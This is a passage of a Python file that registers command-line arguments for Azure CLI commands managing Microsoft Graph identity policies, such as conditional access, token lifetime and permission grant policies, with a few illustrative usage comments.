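#       --block-msol-power-shell false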
with self.argument_context('identitysignins policy create-claim-mapping-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-conditional-access-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
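# Illustrative usage (--state comes from the get_enum_type list above and
# --client-app-types takes space-separated values; names are placeholders):
#   az identitysignins policy create-conditional-access-policy \
#       --display-name "Require MFA" \
#       --state enabledForReportingButNotEnforced \
#       --client-app-types browser mobileAppsAndDesktopClients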
with self.argument_context('identitysignins policy create-home-realm-discovery-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-permission-grant-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('excludes', action=AddExcludes, nargs='+', help='')
c.argument('includes', action=AddIncludes, nargs='+', help='')
with self.argument_context('identitysignins policy create-private-link-resource-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('allowed_tenant_ids', nargs='+', help='')
c.argument('arm_resource_id', type=str, help='')
with self.argument_context('identitysignins policy create-token-issuance-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-token-lifetime-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
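# Illustrative usage: --definition takes one or more JSON strings whose syntax
# depends on the policy type, per the help text above; the body below is a
# placeholder, not a verified policy schema:
#   az identitysignins policy create-token-lifetime-policy \
#       --display-name "Short-lived tokens" --is-organization-default false \
#       --definition '{"TokenLifetimePolicy":{"Version":1,"AccessTokenLifetime":"02:00:00"}}'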
with self.argument_context('identitysignins policy delete-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-admin-consent-request-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-authentication-flow-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-b2-c-authentication-method-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-device-registration-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-directory-role-access-review-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-identity-security-default-enforcement-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy list-activity-based-timeout-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-authorization-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-claim-mapping-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-conditional-access-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-home-realm-discovery-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-permission-grant-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-private-link-resource-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-token-issuance-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-token-lifetime-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-admin-consent-request-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-authentication-flow-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-b2-c-authentication-method-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-device-registration-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-directory-role-access-review-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-identity-security-default-enforcement-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy update-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-admin-consent-request-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='')
c.argument('notify_reviewers', arg_type=get_three_state_flag(), help='')
c.argument('reminders_enabled', arg_type=get_three_state_flag(), help='')
c.argument('request_duration_in_days', type=int, help='')
c.argument('reviewers', action=AddReviewers, nargs='+', help='')
c.argument('version', type=int, help='')
with self.argument_context('identitysignins policy update-authentication-flow-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='', arg_group='Self Service Sign Up')
with self.argument_context('identitysignins policy update-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('allowed_to_sign_up_email_based_subscriptions', arg_type=get_three_state_flag(), help='')
c.argument('allowed_to_use_sspr', arg_type=get_three_state_flag(), help='')
c.argument('allow_email_verified_users_to_join_organization', arg_type=get_three_state_flag(), help='')
c.argument('allow_invites_from', arg_type=get_enum_type(['none', 'adminsAndGuestInviters',
'adminsGuestInvitersAndAllMembers', 'everyone',
'unknownFutureValue']), help='')
c.argument('block_msol_power_shell', arg_type=get_three_state_flag(), help='')
c.argument('default_user_role_permissions', action=AddDefaultUserRolePermissions, nargs='+',
help='defaultUserRolePermissions')
c.argument('enabled_preview_features', nargs='+', help='')
c.argument('guest_user_role_id', help='')
c.argument('permission_grant_policy_ids_assigned_to_default_user_role', nargs='+', help='')
with self.argument_context('identitysignins policy update-b2-c-authentication-method-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_email_password_authentication_enabled', arg_type=get_three_state_flag(), help='')
c.argument('is_phone_one_time_password_authentication_enabled', arg_type=get_three_state_flag(), help='')
c.argument('is_user_name_authentication_enabled', arg_type=get_three_state_flag(), help='')
with self.argument_context('identitysignins policy update-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins policy update-device-registration-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins policy update-directory-role-access-review-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('apply_actions', action=AddApplyActions, nargs='+', help='Expected value: KEY1=VALUE1 '
'KEY2=VALUE2 ...', arg_group='Settings')
c.argument('auto_apply_decisions_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('default_decision', type=str, help='', arg_group='Settings')
c.argument('default_decision_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('instance_duration_in_days', type=int, help='', arg_group='Settings')
c.argument('justification_required_on_approval', arg_type=get_three_state_flag(), help='',
arg_group='Settings')
c.argument('mail_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('recommendations_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('recurrence', type=validate_file_or_dict, help='patternedRecurrence Expected value: '
'json-string/@json-file.', arg_group='Settings')
c.argument('reminder_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
with self.argument_context('identitysignins policy update-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-identity-security-default-enforcement-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='If set to true, Azure Active Directory '
'security defaults are enabled for the tenant.')
with self.argument_context('identitysignins policy update-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('excludes', action=AddExcludes, nargs='+', help='')
c.argument('includes', action=AddIncludes, nargs='+', help='')
with self.argument_context('identitysignins policy update-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('allowed_tenant_ids', nargs='+', help='')
c.argument('arm_resource_id', type=str, help='')
with self.argument_context('identitysignins policy update-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy-permission-grant-policy create-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins policy-permission-grant-policy create-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
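# Illustrative usage (--permission-type comes from the get_enum_type list above;
# ids and the classification value are placeholders):
#   az identitysignins policy-permission-grant-policy create-include \
#       --permission-grant-policy-id <policy-id> \
#       --permission-type delegated --permission-classification low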
with self.argument_context('identitysignins policy-permission-grant-policy delete-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy-permission-grant-policy delete-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy-permission-grant-policy list-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy list-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy show-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy show-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy update-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins policy-permission-grant-policy update-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins risk-detection-risk-detection create-risk-detection') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('activity', arg_type=get_enum_type(['signin', 'user', 'unknownFutureValue']), help='')
c.argument('activity_date_time', help='Date and time that the risky activity occurred.')
c.argument('additional_info', type=str, help='Additional information associated with the risk detection in '
'JSON format.')
c.argument('correlation_id', type=str, help='Correlation ID of the sign-in associated with the risk detection. '
'This property is null if the risk detection is not associated with a sign-in.')
c.argument('detected_date_time', help='Date and time that the risk was detected.')
c.argument('detection_timing_type', arg_type=get_enum_type(['notDefined', 'realtime', 'nearRealtime',
'offline', 'unknownFutureValue']), help='')
c.argument('ip_address', type=str, help='Provides the IP address of the client from where the risk occurred.')
c.argument('last_updated_date_time', help='Date and time that the risk detection was last updated.')
c.argument('request_id', type=str, help='Request ID of the sign-in associated with the risk detection. This '
'property is null if the risk detection is not associated with a sign-in.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_event_type', type=str, help='The type of risk event detected. The possible values are '
'unlikelyTravel, anonymizedIPAddress, maliciousIPAddress, unfamiliarFeatures, '
